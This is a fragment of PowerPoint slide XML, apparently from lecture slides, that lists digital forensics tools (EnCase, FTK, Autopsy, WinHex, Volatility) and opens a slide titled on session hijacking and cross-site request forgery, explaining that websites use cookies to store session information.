                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>evidence.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tools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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>digital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forensics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software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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>are: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900">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3382645">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>EnCase</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-80" b="1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45" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Forensic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55" b="1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135" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90" b="1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25" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-70" b="1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45" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Forensic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65" b="1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55" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Toolkit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60" b="1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-40" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(FTK)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3725545" indent="-343535">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="3725545" algn="l"/>
                <a:tab pos="3726179" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>commercial</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>management</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3725545">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>acquisition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tool.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200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4201795">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95" b="1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80" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Sleuth</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-70" b="1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65" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Kit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105" b="1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80" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90" b="1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105" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Autopsy</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="4544695" indent="-343535">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="4544695" algn="l"/>
                <a:tab pos="4545330" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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100">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>open-source</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>management</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4544695">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="105">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>acquisition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tool.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400">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4201795">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="100" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>WinHex</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="4544695" indent="-343535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4544695" algn="l"/>
                <a:tab pos="4545330" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>forensic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>binary</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tool.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050">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3490595">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100" b="1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60" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Volatility</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100" b="1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100" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Framework</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3833495" indent="-343535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3833495" algn="l"/>
                <a:tab pos="3834129" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tool.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95776" y="306451"/>
            <a:ext cx="866330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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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5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dirty="0" spc="-5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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forgery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9072" y="760476"/>
            <a:ext cx="12888468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805939" y="3371088"/>
            <a:ext cx="3645535" cy="2566670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3645535" h="2566670">
                <a:moveTo>
                  <a:pt x="3217672" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="427736" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381131" y="2510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335980" y="9866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292542" y="21807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251080" y="38072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211854" y="58401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175125" y="82531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141155" y="110203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110203" y="141155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82531" y="175125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58401" y="211854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38072" y="251080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21807" y="292542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9866" y="335980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510" y="381131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="427736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2138679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510" y="2185284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9866" y="2230435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21807" y="2273873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38072" y="2315335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58401" y="2354561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82531" y="2391290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110203" y="2425260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141155" y="2456212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175125" y="2483884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211854" y="2508014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251080" y="2528343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292542" y="2544608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335980" y="2556549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381131" y="2563905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427736" y="2566416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3217672" y="2566416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3264276" y="2563905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3309427" y="2556549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3352865" y="2544608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3394327" y="2528343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3433553" y="2508014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3470282" y="2483884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3504252" y="2456212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3535204" y="2425260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3562876" y="2391290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3587006" y="2354561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3607335" y="2315335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623600" y="2273873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3635541" y="2230435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3642897" y="2185284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3645408" y="2138679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3645408" y="427736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3642897" y="381131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3635541" y="335980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623600" y="292542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3607335" y="251080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3587006" y="211854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3562876" y="175125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3535204" y="141155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3504252" y="110203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3470282" y="82531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3433553" y="58401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3394327" y="38072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3352865" y="21807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3309427" y="9866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3264276" y="2510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3217672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011172" y="3838473"/>
            <a:ext cx="3231515" cy="1555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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>vis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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6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75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0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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>webs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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25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5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9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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>co</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040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70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>kie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040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14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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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3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5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5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20">
                <a:solidFill>
                  <a:srgbClr val="404040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1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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>to  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>store </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>information.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707123" y="3374135"/>
            <a:ext cx="3645535" cy="2554605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
